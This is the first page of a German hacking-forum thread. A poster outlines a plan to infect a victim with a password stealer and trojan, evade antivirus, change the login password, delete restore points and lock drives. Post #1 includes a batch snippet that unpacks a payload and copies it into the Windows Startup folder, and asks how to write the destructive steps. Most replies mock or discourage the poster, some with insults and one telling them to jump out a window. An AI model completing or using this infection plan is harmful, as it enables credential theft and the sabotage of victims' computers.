Seite 1 von 3 123 LetzteLetzte
Ergebnis 1 bis 10 von 21
  1. #1
    Anfänger Avatar von Laura Dünnwald
    Registriert seit
    27.10.2017
    Beiträge
    13

    Pfeil Übelster Virus

    hi,

    hab mal ne frage.

    also ich hab da son plan wie man jemanden infiziert,
    aber so das er windows neu installieren muss,
    und die frage ist ob das geht:

    schritt 1:

    opfer löst pw stealer mit trojaner aus,welche erst aus geführt werden wenn,
    eine .batch datei sie ausführt und nebenbei sich noch ins startmenü kopiert durch die .batch welche,
    diese .batch datei wird aber erkannt und von einen .vb scrypt ausgeführt und dadurch wird alles noch mit,
    einen .sfx archiv (winrar) verpackt,(doppelt) und beim ersten packen mit pw versehen.
    dann ist es FUD nach bearbeiten mit assembly changer,icon changer und file pumper.

    schritt 2:
    dann in der .batch vorher noch mit hereinschreiben das beim nächsten neustart des pcs,
    bevor das rootkit nach dem hochfahren gelöscht wird,(falls erkannt),(vor desktop beginnt zu starten)
    dass in der .batch steht dass das benutzer-login konto kennwort geändert wird.

    schritt 3:
    damit kein wiederherstellungspunkt benutzt werden kann oder mithilfe eines
    images oder ohne systemwiederherstellung machen kann,noch in der .batch reinschreiben dass,
    alle wiederherstellungspunkte gelöscht werden und,
    das alle laufwerke gesperrt werden,jedenfalls dass wo windows drauf ist,damit man auch nicht die berühmte,
    rename utilman.exe blablabla methode in der cmd eingeben kann,also eintippen schon aber es nicht bestätigt wird.


    geht dass alles?

    ich hab schritt 1 schon realisiert.

    was muss ich in die .batch reinschreiben damit das benutzerkonto,
    ein pw hat nach pc neustart was ich will?
    und was muss ich in die .batch reinschreiben damit die laufwerke gesperrt werden und die wiederherstellungspunkte gelöscht werden,geht das überheupt mit .batch???
    und wenn ja wie?

    mein .batch code sieht bisher wie folgt aus bevor das .vb scrypt es ausführt:

    Install.sfx.exe -p....Setup....Is....Installing....Updates.... -d\ProgramData\ProductData\
    Install.exe
    ECHO Y | xcopy /s "\ProgramData\ProductData\Install.exe" "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Win dows\Start Menu\Programs\Startup"

    was muss folgen,kenne mich da nicht so gut aus und google sagt alles verschieden,finde nicht das richtige.
    oder es ist in der falschen reihenfolge.

    danke für hilfe,gruß

  2. #2
    NoClose Wurm Avatar von Braz
    Registriert seit
    19.05.2015
    Beiträge
    159

    Standard AW: Übelster Virus

    Ich hab in der Mitte von deinem Post aufgehört zu lesen.
    Sorry aber sowas behindertes habe ich schon lange nicht mehr gelesen.

    Aber 'keep on doing', somit kann ich nächstes mal nochmal lachen, falls du es vorstellst.

    PS.:
    Wenn das ein Troll-Acc von euch ist, dann bitte PM.
    ______________________________________
    Seitdem ich perfekt bin, hält sich meine Arroganz in Grenzen.

  3. #3
    Anfänger Avatar von Laura Dünnwald
    Registriert seit
    27.10.2017
    Beiträge
    13

    Standard AW: Übelster Virus

    ZITAT:

    Ich hab in der Mitte von deinem Post aufgehört zu lesen.
    Sorry aber sowas behindertes habe ich schon lange nicht mehr gelesen.

    Aber 'keep on doing', somit kann ich nächstes mal nochmal lachen, falls du es vorstellst.

    PS.:
    Wenn das ein Troll-Acc von euch ist, dann bitte PM.
    -----------------------------------------------------------------------------------------


    hast pm ich bins,du weisst schon^^

    hey ich will was lernen,wenn du die antwort weisst dann schreib was,
    wenn nicht,dann hate nicht rum,das ist ne einfache batch frage.

  4. #4
    Wiederbelebt Avatar von Cystasy
    Registriert seit
    08.05.2015
    Beiträge
    685

    Standard AW: Übelster Virus

    1) Bei deinem Post habe ich echt unlust bekommst dir zu helfen. Dein gesamter Posting ist Chaos in Reinform.. man checkt nicht "was will der da jetzt von uns? Und was will er da überhaupt jetzt tun / haben?". Er wäre sinnvoll wenn du vllt dein Post nochmals neu verfässt,diesmal aber ausgeschlafen & nüchtern.. und mit etwas mehr Mühe als vllt nur 5 Minuten wenn du es anders nicht packst^^

    2) Batch Dateien haben keine Endung die .batch lautet sondern entweder .bat oder .cmd - aus deinem Posting geht für mich hervor das du dich nicht wirklich mit Batch etc. befasst hast bisher.. und ich sehe da in deinem Posting auch nicht den Lern-willen sondern eher den Zerstörungswillen. Das finde ich nicht wirklich gut.

    3) Wenn du dir jetzt nochmals ein bisschen mehr Mühe gibst, kann man dir vllt helfen wenn du echt das Chaos mal beseitigst damit man auch klar und deutlich kapiert was du überhaupt von uns möchtest.

    Nicht Böse gemeint, versteh das nicht falsch - aber dein Posting wirkte auf mich beim lesen als wär dieser in keinem nüchternen Zustand entstanden durch das Chaos. Da hat man dann auch keine Lust zu Antworten (siehe vorposter) wenn man sowas vor die Augen bekommt.

    Kurzfassung: Theoretisch, klar. Praktisch, klar. Du solltest aber zuvor dich erstmal mit der Materie befassen und nicht copycat spielen um dir irgendein Schädliches Tool zusammenzutackern. Das führt so zu nix.

    grüße
    エロ <3

  5. #5
    RockSt★r Avatar von Alucart
    Registriert seit
    03.07.2009
    Beiträge
    435

    Standard AW: Übelster Virus

    Kann das irgendeiner von euch irgendwie nachvollziehen?

    if (sad() == true)
    {
    Sad().Stop();
    beAwesome();
    }


  6. #6
    NoClose Wurm Avatar von Braz
    Registriert seit
    19.05.2015
    Beiträge
    159

    Standard AW: Übelster Virus

    Zitat Zitat von Alucart Beitrag anzeigen
    Kann das irgendeiner von euch irgendwie nachvollziehen?
    Je öfter ich es lese, desto schwieriger wird es, es zu durchblicken.
    ______________________________________
    Seitdem ich perfekt bin, hält sich meine Arroganz in Grenzen.

  7. #7
    Milw0rm Avatar von novedad
    Registriert seit
    12.05.2010
    Beiträge
    589

    Standard AW: Übelster Virus

    Bitte hör auf hier zu posten. Da bekommt man (unter anderem) Augenkrebs. Du hast null Ahnung, und null Lust dir das nötige Wissen anzueignen. Ich vermute du bist ein 12-Jähriges Scriptkiddie, das Langweile hat. Wirf am besten deinen PC so schnell wie möglich aus dem Erdgeschossfenster und spring am besten gleich hinterher

    PS.: NIEMAND entwickelt wirklich produktive "Viren" mit Batch. Aber für mehr bist du sicher auch zu dämlich
    Geändert von novedad (15.11.2017 um 17:56 Uhr)
    Seitdem ich perfekt bin hält sich meine Arroganz in Grenzen



  8. Folgende Benutzer haben sich für diesen Beitrag bedankt:

    Braz (16.11.2017)

  9. #8
    Anfänger Avatar von Einstein
    Registriert seit
    22.04.2017
    Beiträge
    17

    Standard AW: Übelster Virus

    Okay, ich bin keine böse Socke aber um einem System so weit zu Schaden das es neu Installiert werden muss geht auch deutlich einfacher. Auch ich habe Schwierigkeiten dir zu Folgen, dennoch gebe ich dir den Rat Informiere dich erstmal und dann Poste etwas. Hier gibt jeder sein wissen gerne weiter, aber nicht für eine so "kindliche" Aktion. Ich hätte es ja verstanden wenn du den Technischen Aspekt beleuchtet haben möchtest welche Maßnahmen ein System in die knie Zwingen oder es unbrauchbar machen, aber das scheint mir eher ein versuch zu sein Leuten auf den Senkel zu gehen. Ich weiß im jungem alter ist das alles aufregend und spannend, aber denke einfach mal etwas weiter bevor du irgend was wo ausführen oder "hacken" willst. Da kann deutlich mehr Schaden enstehen als man eventuell im Horizont zwischen Neugierde und "Paupertät" erblicken kann.

    mfg
    Geändert von Einstein (15.11.2017 um 18:11 Uhr)
    Das sind nicht die Android Updates die ihr sucht.

  10. #9
    Anfänger
    Registriert seit
    30.05.2017
    Beiträge
    18

    Standard AW: Übelster Virus

    Zitat Zitat von novedad Beitrag anzeigen
    Bitte hör auf hier zu posten. Da bekommt man (unter anderem) Augenkrebs. Du hast null Ahnung, und null Lust dir das nötige Wissen anzueignen. Ich vermute du bist ein 12-Jähriges Scriptkiddie, das Langweile hat. Wirf am besten deinen PC so schnell wie möglich aus dem Erdgeschossfenster und spring am besten gleich hinterher

    PS.: NIEMAND entwickelt wirklich produktive "Viren" mit Batch. Aber für mehr bist du sicher auch zu dämlich
    Du kannst wohl auch nicht viel älter als 12 Jahre alt sein so wie du dich hier ausdrückst...
    Was ist den das bitteschön für eine Wortwahl?

    Kleiner Tipp von mir:
    Schau dir nochmal ganz in Ruhe deinen Beitrag an und überdenke erst einmal deine Ausdrucksweise. Danach könntest du versuchen (ja, ich weis das es sehr schwierig ist aber ich glaube ganz fest an dich!) etwas nettere Worte zu finden.

    Mal ganz im Ernst Leute was ist den das hier für ein Umgang?
    Da kann man doch auch etwas respektvoller miteinander Umgehen oder nicht?


    PS: Soll jetzt nicht gegen alle Personen hier gerichtet sein!

  11. #10
    Gesperrt
    Registriert seit
    29.01.2016
    Beiträge
    215

    Standard AW: Übelster Virus

    Zitat Zitat von w0rms Beitrag anzeigen
    Du kannst wohl auch nicht viel älter als 12 Jahre alt sein so wie du dich hier ausdrückst...
    Was ist den das bitteschön für eine Wortwahl?

    Kleiner Tipp von mir:
    Schau dir nochmal ganz in Ruhe deinen Beitrag an und überdenke erst einmal deine Ausdrucksweise. Danach könntest du versuchen (ja, ich weis das es sehr schwierig ist aber ich glaube ganz fest an dich!) etwas nettere Worte zu finden.

    Mal ganz im Ernst Leute was ist den das hier für ein Umgang?
    Da kann man doch auch etwas respektvoller miteinander Umgehen oder nicht?


    PS: Soll jetzt nicht gegen alle Personen hier gerichtet sein!
    Warum richtest du dich gegen mich?!?!?!?!?!!!!!1111111!!eins!eins!!!!elf
    Wir sind hier in der Hackingszene. Hier gibt es keinen Reschpeckt! *spuck*

Seite 1 von 3 123 LetzteLetzte

Ähnliche Themen

  1. Virus
    Von Giertier im Forum Sicherheit
    Antworten: 7
    Letzter Beitrag: 16.07.2009, 13:08
  2. Virus?
    Von oxmox im Forum Erkennung & Hilfe
    Antworten: 6
    Letzter Beitrag: 28.02.2009, 11:28

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •